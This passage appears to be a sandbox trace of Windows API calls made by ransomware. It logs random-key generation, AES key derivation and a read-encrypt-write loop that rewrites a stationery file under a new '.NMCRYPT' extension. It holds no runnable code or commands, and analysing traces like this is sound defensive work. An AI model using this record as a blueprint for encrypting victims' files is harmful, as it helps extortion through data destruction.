hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.867] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.868] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.868] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.869] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0163.869] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.869] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad2f8) returned 1 [0163.869] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.869] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.869] wcslen (_String="\\\\?\\") returned 0x4 [0163.869] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0163.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.870] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=152300) returned 1 [0163.870] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.870] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.905] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.905] GetLastError () returned 0x0 [0163.905] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.009] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.009] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.009] GetLastError () returned 0x0 [0164.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.010] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.010] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.010] GetLastError () returned 0x0 [0164.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.010] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.010] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.010] GetLastError () returned 0x0 [0164.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.010] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.010] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.010] GetLastError () returned 0x0 [0164.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.010] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.010] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.010] GetLastError () returned 0x0 [0164.010] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.010] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.011] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.011] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.011] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.011] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.011] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.011] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.011] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.011] GetLastError () returned 0x0 [0164.011] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.012] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.012] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.012] GetLastError () returned 0x0 [0164.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.012] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.012] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.012] GetLastError () returned 0x0 [0164.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.012] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.012] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.012] GetLastError () returned 0x0 [0164.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.012] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.012] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.012] GetLastError () returned 0x0 [0164.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.012] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.012] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.012] GetLastError () returned 0x0 [0164.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 